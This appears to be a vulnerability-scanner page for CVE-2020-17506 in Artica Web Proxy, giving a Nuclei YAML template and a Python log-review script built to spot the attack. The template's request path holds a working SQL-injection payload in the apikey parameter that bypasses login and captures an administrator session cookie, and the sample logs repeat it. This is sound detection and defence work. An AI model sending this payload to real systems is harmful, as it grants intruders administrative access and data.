Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection
ID: CVE-2020-17506
Severity: critical
Author: dwisiswant0
Tags: cve,cve2020,artica,proxy,packetstorm,articatech,sqli
Description
Artica Web Proxy 4.30.00000000 allows a remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.
YAML Source
id: CVE-2020-17506

info:
  name: Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection
  author: dwisiswant0
  severity: critical
  description: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and execute arbitrary SQL queries, potentially leading to unauthorized access and data leakage.
  remediation: |
    Upgrade to a patched version of Artica Web Proxy or apply the vendor-supplied patch to mitigate this vulnerability.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17506
    - http://packetstormsecurity.com/files/158868/Artica-Proxy-4.3.0-Authentication-Bypass.html
    - https://blog.max0x4141.com/post/artica_proxy/
    - https://github.com/hangmansROP/proof-of-concepts
    - https://github.com/merlinepedra/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-17506
    cwe-id: CWE-89
    epss-score: 0.96009
    epss-percentile: 0.99439
    cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: articatech
    product: web_proxy
  tags: cve,cve2020,artica,proxy,packetstorm,articatech,sqli

http:
  - method: GET
    path:
      - "{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"

    host-redirects: true
    max-redirects: 1

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "artica-applianc"

      - type: word
        part: header
        words:
          - "PHPSESSID"

      - type: status
        status:
          - 200
          - 301
          - 302
        condition: or

    extractors:
      - type: kval
        kval:
          - "PHPSESSID"
# digest: 4a0a0047304502204bdd7908870ece22b4998fad10a5006e2e2ec283705dba9b603d66c24e565385022100d93de6130cbd895b0087ad17e2a02b0e4e9982e41fbb43cf860cac2ba4787db6:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-17506.yaml"
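To complement the scan on the defensive side, the following added example (not part of the template or of the Nuclei project) reviews web access logs for requests to fw.login.php whose apikey parameter carries quotes or SQL keywords. The log lines are constructed samples in combined log format, and the rule that a legitimate key contains only letters, digits, `_` and `-` is an assumption to adjust for your deployment.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format), not from a real system.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Aug/2020:10:01:02 +0000] "GET /fw.login.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Aug/2020:10:01:09 +0000] "GET /fw.login.php?apikey=%27UNION%20select%201,%27QUJD%27; HTTP/1.1" 302 0 "-" "curl/7.68.0"
198.51.100.4 - - [12/Aug/2020:10:02:30 +0000] "GET /fw.login.php?apikey=3f9a1c7e5b2d4a60 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.8 - - [12/Aug/2020:10:03:11 +0000] "GET /fw.login.php?apikey=%2527x HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.8 - - [12/Aug/2020:10:03:40 +0000] "GET /index.php?apikey=%27x HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

REQUEST = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
SQL_TOKENS = re.compile(r"\b(union|select|sleep|benchmark)\b|/\*", re.I)
# Assumption: a legitimate API key is a plain token made of these characters.
PLAIN_KEY = re.compile(r"[A-Za-z0-9_\-]*")

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %2527) before inspecting the value."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def find_apikey_injection(log_text):
    """Return one finding per fw.login.php request with a suspicious apikey."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.lower().endswith("/fw.login.php"):
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get("apikey", []):
            value = fully_decode(raw)
            reasons = []
            if "'" in value or '"' in value:
                reasons.append("quote")
            if SQL_TOKENS.search(value):
                reasons.append("sql-token")
            if not reasons and not PLAIN_KEY.fullmatch(value):
                reasons.append("unexpected-characters")
            if reasons:
                findings.append({"ip": m["ip"], "status": int(m["status"]),
                                 "apikey": value, "reasons": reasons})
    return findings

if __name__ == "__main__":
    print(*find_apikey_injection(SAMPLE_LOG), sep="\n")
```

A finding with a 200, 301 or 302 status, the codes the template's status matcher accepts, deserves priority review.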